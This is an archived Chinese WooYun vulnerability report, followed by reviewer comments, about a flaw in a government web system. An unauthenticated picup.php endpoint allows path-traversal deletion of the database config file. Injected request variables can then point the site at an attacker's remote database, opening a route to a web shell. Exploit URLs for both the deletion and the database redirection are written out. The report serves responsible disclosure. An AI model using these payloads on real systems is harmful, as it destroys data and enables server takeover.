漏洞概要
关注数(14)
关注此漏洞
漏洞标题: 某Gov在用系统任意文件删除导致可getshell
提交时间: 2014-11-28 21:01
公开时间: 2015-02-24 21:02
漏洞类型: 设计缺陷/逻辑错误
危害等级: 高
自评Rank: 20
漏洞状态:
已交由第三方合作机构(cncert国家互联网应急中心)处理
Tags标签:
无
漏洞详情
披露状态:
2014-11-28: 细节已通知厂商并且等待厂商处理中
2014-12-01: 厂商已经确认,细节仅向厂商公开
2014-12-04: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2015-01-25: 细节向核心白帽子及相关领域专家公开
2015-02-04: 细节向普通白帽子公开
2015-02-14: 细节向实习白帽子公开
2015-02-24: 细节向公众公开
简要描述:
逻辑。。。逻辑。。。
整套系统采用全局变量。攻击思路如下: 删除数据库配置文件--->利用get、post、cookie方式重新赋值$host,$dbname,$dbpass--->从而控制整个数据库(自己搭建远程数据库)--->找eval函数,直接getshell。。。
这样做会导致网站直接挂掉。(太暴力了)
详细说明:
看这里,看这里 ...
http://**.**.**.**/bugs/wooyun-2014-083077
在网站根目录当中有一个picup.php文件
其中headinc.php文件里面没有权限限制。
代码如下:
看其中变量赋值方式..
所以直接即访问:**.**.**.**/picup.php?action=del&pic=../includes/config.php
(千万别访问,一访问,网站就挂了)
第二部、远程搭建一个该类型数据库
然后重新赋值以下几个变量
如采用
**.**.**.**/picup.php?action=del&pic=../includes/config.php&dbhost=**.**.**.**&dbuname=3333&dbpass=3333&dbname=dddd
找到网站当中的其他eval函数,控制该数据库某变量即可getshell(其中找eval测试我就不提供了)。。这样会导致很多站挂。。。(请参考13年qibocms getshell)
太黄太暴力,各位测试的需小心...本文只提供思路...后果自负..
漏洞证明:
**.**.**.**/picup.php?action=del&pic=../includes/configxxxxxxxx.php(千万别访问,你可以删其他的,你一访问,站就挂了)
修复方案:
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:14
确认时间:2014-12-01 11:35
厂商回复:
最新状态:
暂无
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
评价
-
2014-11-26 21:41 |
U神
( 核心白帽子 |
Rank:1360 漏洞数:150 | 乌云核心菜鸟,联盟托管此号中,欢迎加入08...)
1
-
2015-02-24 21:36 |
窝窝哥
( 实习白帽子 |
Rank:88 漏洞数:30 | 没WB啊啊啊啊!)
0
-
2015-02-28 11:36 |
wefgod
( 核心白帽子 |
Rank:1829 漏洞数:183 | 力不从心)
0